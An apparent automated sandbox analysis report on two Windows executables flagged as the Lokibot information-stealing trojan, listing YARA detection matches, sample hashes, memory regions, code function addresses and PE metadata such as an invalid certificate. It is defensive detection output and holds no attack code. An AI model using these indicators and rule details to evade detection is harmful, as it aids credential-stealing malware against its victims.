Source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: LEmJJ87mUQ.exe, 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, aWBoUwiux.exe, 00000009.00000002.2502975409.0000000002954000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, aWBoUwiux.exe, 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, aWBoUwiux.exe, 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: LEmJJ87mUQ.exe PID: 5016, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 2568, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: aWBoUwiux.exe PID: 5572, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_0187E274	0_2_0187E274
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_056A2D18	0_2_056A2D18
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_056A2768	0_2_056A2768
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_056A2757	0_2_056A2757
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_07B09B00	0_2_07B09B00
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_07B014D8	0_2_07B014D8
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_07B03110	0_2_07B03110
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_07B03100	0_2_07B03100
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_07B010A0	0_2_07B010A0
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_07B02CD8	0_2_07B02CD8
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_07B02CC8	0_2_07B02CC8
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_07B00C68	0_2_07B00C68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0040549C	8_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_004029D4	8_2_004029D4
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Code function: 9_2_028DE274	9_2_028DE274
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Code function: 9_2_06F314D8	9_2_06F314D8
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Code function: 9_2_06F32CD8	9_2_06F32CD8
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Code function: 9_2_06F32CC8	9_2_06F32CC8
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Code function: 9_2_06F30C68	9_2_06F30C68
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Code function: 9_2_06F310A0	9_2_06F310A0
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Code function: 9_2_06F33110	9_2_06F33110
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Code function: 9_2_06F33100	9_2_06F33100

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 1788

Source: LEmJJ87mUQ.exe

Static PE information: invalid certificate

Source: LEmJJ87mUQ.exe, 00000000.00000002.2352129099.0000000007E92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs LEmJJ87mUQ.exe
Source: LEmJJ87mUQ.exe, 00000000.00000002.2352129099.0000000007E92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs LEmJJ87mUQ.exe
Source: LEmJJ87mUQ.exe, 00000000.00000002.2351790271.0000000007BBB000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs LEmJJ87mUQ.exe
Source: LEmJJ87mUQ.exe, 00000000.00000002.2347808139.000000000427D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs LEmJJ87mUQ.exe
Source: LEmJJ87mUQ.exe, 00000000.00000000.2255595949.0000000000D42000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamezdr.exe: vs LEmJJ87mUQ.exe
Source: LEmJJ87mUQ.exe, 00000000.00000002.2346236371.000000000142E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs LEmJJ87mUQ.exe
Source: LEmJJ87mUQ.exe	Binary or memory string: OriginalFilenamezdr.exe: vs LEmJJ87mUQ.exe

Source: LEmJJ87mUQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
